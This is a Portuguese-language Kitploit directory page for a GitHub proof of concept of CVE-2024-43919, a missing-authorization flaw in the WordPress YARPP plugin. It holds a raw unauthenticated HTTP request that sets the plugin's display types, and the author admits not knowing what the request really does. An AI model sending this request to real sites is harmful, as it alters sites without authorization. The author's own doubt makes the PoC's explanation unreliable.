Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-43919 — YARPP <= 5.30.10 - Autorização Ausente | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-43919
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoConfiguração Incorreta
GitHubrandomrobbiebf/cve-2024-43919

CVE-2024-43919

YARPP <= 5.30.10 - Autorização Ausente

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-43919

YARPP <= 5.30.10 - Autorização Ausente

Descrição

O plugin YARPP – Yet Another Related Posts Plugin para WordPress é vulnerável a acesso não autorizado devido à falta de uma verificação de capacidade no arquivo ~/includes/yarpp_pro_set_display_types.php em todas as versões até, e incluindo, 5.30.10. Isso possibilita que atacantes não autenticados definam tipos de exibição.

root@kitploit:~
Type: plugin
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE: CVE-2024-43919
Slug: yet-another-related-posts-plugin

Informação

Não faço ideia do que isso realmente faz.

POC

Aqui está um exemplo de uma requisição HTTP bruta que explora a vulnerabilidade no plugin YARPP:

root@kitploit:~
GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com

Nesta requisição:

  • O parâmetro ypsdt é definido como false para contornar a verificação inicial no código.
  • O parâmetro types[] é usado para especificar os tipos de exibição a serem definidos. Neste exemplo, post e page são passados como tipos.
  • O cabeçalho Host especifica o site WordPress alvo que hospeda o plugin YARPP vulnerável.
  • Quando esta requisição é enviada a um site WordPress com uma versão vulnerável do plugin YARPP instalada, ela definirá os tipos de exibição sem exigir qualquer autenticação ou autorização.

    Baixar ferramenta